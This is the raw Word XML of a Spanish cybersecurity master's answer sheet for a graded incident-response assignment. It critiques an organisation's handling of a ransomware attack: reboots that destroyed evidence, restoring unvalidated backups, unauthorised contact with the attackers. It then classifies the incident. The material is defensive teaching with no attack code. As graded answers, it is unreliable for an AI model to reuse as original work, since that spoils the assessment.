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jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="0" distT="0" distL="0" distR="0">
            <wp:extent cx="3463962" cy="1119881"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr descr="Logotipo&#10;&#10;Descripción generada automáticamente" id="2" name="image2.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr descr="Logotipo&#10;&#10;Descripción generada automáticamente" id="0" name="image2.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId6"/>
                    <a:srcRect b="22266" l="0" r="0" t="20259"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3463962" cy="1119881"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table1"/>
        <w:tblW w:w="9390.0" w:type="dxa"/>
        <w:jc w:val="center"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="0600"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="6690"/>
        <w:gridCol w:w="2700"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="6690"/>
            <w:gridCol w:w="2700"/>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02">
            <w:pPr>
              <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
              <w:ind w:left="-141" w:firstLine="0"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distB="0" distT="0" distL="0" distR="0">
                  <wp:extent cx="1826944" cy="801090"/>
                  <wp:effectExtent b="0" l="0" r="0" t="0"/>
                  <wp:docPr descr="Logotipo, nombre de la empresa&#10;&#10;Descripción generada automáticamente" id="4" name="image3.jpg"/>
                  <a:graphic>
                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                      <pic:pic>
                        <pic:nvPicPr>
                          <pic:cNvPr descr="Logotipo, nombre de la empresa&#10;&#10;Descripción generada automáticamente" id="0" name="image3.jpg"/>
                          <pic:cNvPicPr preferRelativeResize="0"/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId7"/>
                          <a:srcRect b="41204" l="31030" r="30984" t="35253"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="1826944" cy="80109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03">
            <w:pPr>
              <w:spacing w:after="160"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04">
      <w:pPr>
        <w:spacing w:line="276"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05">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48"/>
          <w:szCs w:val="48"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">RESPUESTAS DE LA TAREA EVALUABLE</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000006">
      <w:pPr>
        <w:spacing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7">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="f77d44"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Máster en Ciberseguridad</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000008">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="c00000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000009">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MÓDULO </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000A">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="f77d44"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="f77d44"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Introducción a la respuesta a incidentes</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000B">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="c00000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000C">
      <w:pPr>
        <w:spacing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PROFESORES</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000D">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="f77d44"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>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907" w:top="907" w:left="1247" w:right="1247" w:header="567" w:footer="397"/>
          <w:pgNumType w:start="1"/>
          <w:titlePg w:val="1"/>
        </w:sectPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="f77d44"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">D.ª Sara Concepción Mariscal y D. Alberto Jódar Borrego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313054</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>901700</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5445868" cy="3462219"/>
                <wp:effectExtent b="0" l="0" r="0" t="0"/>
                <wp:wrapNone/>
                <wp:docPr id="1" name=""/>
                <a:graphic>
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:cNvPr id="2" name="Shape 2"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="2635766" y="2061591"/>
                          <a:ext cx="5420468" cy="3436819"/>
                        </a:xfrm>
                        <a:prstGeom prst="ellipse">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:blipFill rotWithShape="1">
                          <a:blip r:embed="rId14">
                            <a:alphaModFix/>
                          </a:blip>
                          <a:stretch>
                            <a:fillRect b="0" l="0" r="0" t="0"/>
                          </a:stretch>
                        </a:blip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313054</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>901700</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5445868" cy="3462219"/>
                <wp:effectExtent b="0" l="0" r="0" t="0"/>
                <wp:wrapNone/>
                <wp:docPr id="1"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5445868" cy="3462219"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect"/>
                        <a:ln/>
                      </pic:spPr>
                    </pic:pic>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Fallback>
        </mc:AlternateConten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20" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_uumhuawoarbt" w:id="0"/>
      <w:bookmarkEnd w:id="0"/>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1843"/>
        </w:tabs>
        <w:spacing w:after="0" w:before="240" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
          <w:color w:val="f7964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f79646"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Contenido</w:t>
      </w:r>
    </w:p>
    <w:sdt>
      <w:sdtPr>
        <w:id w:val="-448316376"/>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40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n2vn1sfdub4">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1.</w:t>
            </w:r>
          </w:hyperlink>
          <w:hyperlink w:anchor="_qn2vn1sfdub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_qn2vn1sfdub4 \h </w:instrText>
            <w:fldChar w:fldCharType="separate"/>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Tarea 1: Evaluación de la respuesta a un incidente (4 puntos)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402"/>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k3d07xldtew">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1.1.</w:t>
            </w:r>
          </w:hyperlink>
          <w:hyperlink w:anchor="_uk3d07xldte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_uk3d07xldtew \h </w:instrText>
            <w:fldChar w:fldCharType="separate"/>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Punto evaluable 1</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402"/>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68b0fzfa91q">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1.2.</w:t>
            </w:r>
          </w:hyperlink>
          <w:hyperlink w:anchor="_a68b0fzfa91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_a68b0fzfa91q \h </w:instrText>
            <w:fldChar w:fldCharType="separate"/>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Punto evaluable 2</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402"/>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1mb1dfipks6">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1.3.</w:t>
            </w:r>
          </w:hyperlink>
          <w:hyperlink w:anchor="_11mb1dfipks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_11mb1dfipks6 \h </w:instrText>
            <w:fldChar w:fldCharType="separate"/>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Punto evaluable 3</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402"/>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f94b42vcuf1">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1.4.</w:t>
            </w:r>
          </w:hyperlink>
          <w:hyperlink w:anchor="_gf94b42vcuf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_gf94b42vcuf1 \h </w:instrText>
            <w:fldChar w:fldCharType="separate"/>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Punto evaluable 4</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40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lhet8k8ib92">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2.</w:t>
            </w:r>
          </w:hyperlink>
          <w:hyperlink w:anchor="_6lhet8k8ib9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_6lhet8k8ib92 \h </w:instrText>
            <w:fldChar w:fldCharType="separate"/>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Tarea 2: Evaluación de la respuesta a un incidente (6 puntos)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402"/>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qywbqdhyliv">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2.1.</w:t>
            </w:r>
          </w:hyperlink>
          <w:hyperlink w:anchor="_2qywbqdhyli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_2qywbqdhyliv \h </w:instrText>
            <w:fldChar w:fldCharType="separate"/>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Punto evaluable 1</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402"/>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2w0e3n4s91y">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2.2.</w:t>
            </w:r>
          </w:hyperlink>
          <w:hyperlink w:anchor="_o2w0e3n4s91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_o2w0e3n4s91y \h </w:instrText>
            <w:fldChar w:fldCharType="separate"/>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Punto evaluable 2</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402"/>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7jm2qw6ukol">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2.3.</w:t>
            </w:r>
          </w:hyperlink>
          <w:hyperlink w:anchor="_n7jm2qw6uko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_n7jm2qw6ukol \h </w:instrText>
            <w:fldChar w:fldCharType="separate"/>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Punto evaluable 3</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60" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001B">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="568" w:hanging="284"/>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1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:leader="none" w:pos="1843"/>
        </w:tabs>
        <w:ind w:left="360" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_qn2vn1sfdub4" w:id="1"/>
      <w:bookmarkEnd w:id="1"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="f79646"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Tarea 1: Evaluación de la respuesta a un incidente (4 puntos)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001D">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="397" w:hanging="397"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_uk3d07xldtew" w:id="2"/>
      <w:bookmarkEnd w:id="2"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Punto evaluable 1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001E">
      <w:pPr>
        <w:ind w:left="397" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="6aa84f"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_illqfpxnqzg1" w:id="3"/>
      <w:bookmarkEnd w:id="3"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="6aa84f"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Valor: +0,5 puntos </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001F">
      <w:pPr>
        <w:ind w:left="397" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000020">
      <w:pPr>
        <w:ind w:left="397" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Respuesta: Texto libre</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000021">
      <w:pPr>
        <w:ind w:left="397" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000022">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Falta de procedimientos y desorganización</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="333333"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: El error principal es no disponer de un plan de respuesta a incidentes por escrito. Eso provoca una actuación descoordinada e inefectiva, porque no se definen roles, prioridades ni pasos a seguir según el tipo de incidente.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000023">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Mala gestión técnica y pérdida de evidencia forense</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="333333"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Se reiniciaron servidores y se apagaron equipos sin preservar antes la evidencia. Reiniciar no va a descifrar los archivos y, además, puede destruir datos volátiles útiles para el análisis forense. La prioridad inicial debe ser aislar de forma coordinada los sistemas afectados y no apagar equipos.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000024">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Inexistencia de personal especializado</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="333333"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: No contar con un equipo interno de respuesta o, al menos, activar de inmediato al proveedor especializado de ciberseguridad fue un fallo relevante. La contención, el análisis y la coordinación técnica no deberían recaer en personal improvisado en mitad del incidente.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000025">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Gestión negligente de los backups</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="333333"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Se intentó restaurar una copia de seguridad sin validar antes si estaba íntegra o comprometida. En ransomware, los atacantes suelen intentar cifrar o inutilizar las copias accesibles para impedir la recuperación. Restaurar sin haber contenido primero la intrusión puede reintroducir el problema y, además, eliminar trazas útiles para la investigación.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000026">
      <w:pPr>
        <w:pBdr>
          <w:top w:color="000000" w:space="4" w:sz="4" w:val="single"/>
          <w:left w:color="000000" w:space="4" w:sz="4" w:val="single"/>
          <w:bottom w:color="000000" w:space="4" w:sz="4" w:val="single"/>
          <w:right w:color="000000" w:space="4" w:sz="4" w:val="single"/>
        </w:pBdr>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:after="240" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Contacto directo con los atacantes sin autorización</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="333333"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Un administrador contactó con el grupo criminal sin coordinación con dirección, legal ni el equipo de respuesta. Esa actuación no garantiza la recuperación, puede entorpecer la gestión del incidente y complica cualquier decisión posterior sobre notificación, negociación o denuncia.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000027">
      <w:pPr>
        <w:ind w:left="397" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000028">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="397" w:hanging="397"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_a68b0fzfa91q" w:id="4"/>
      <w:bookmarkEnd w:id="4"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Punto evaluable 2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000029">
      <w:pPr>
        <w:ind w:left="397" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="6aa84f"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="6aa84f"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Valor: +0,5 puntos </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002A">
      <w:pPr>
        <w:ind w:left="397" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002B">
      <w:pPr>
        <w:spacing w:after="100" w:lineRule="auto"/>
        <w:ind w:left="397" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Respuesta: </w:t>
      </w:r>
    </w:p>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Taxonomía | Peligrosidad | Impacto</w:t>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Justificación en texto libre de la asignación del valor de cada una de las categorías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F">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Taxonomía</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="333333"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Código Dañino (Malware), concretamente ransomware. La clasificación es coherente con un escenario en el que un software malicioso cifra archivos de recursos compartidos y añade una extorsión económica para recuperar el acceso.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000030">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Peligrosidad</w:t>
      </w:r>
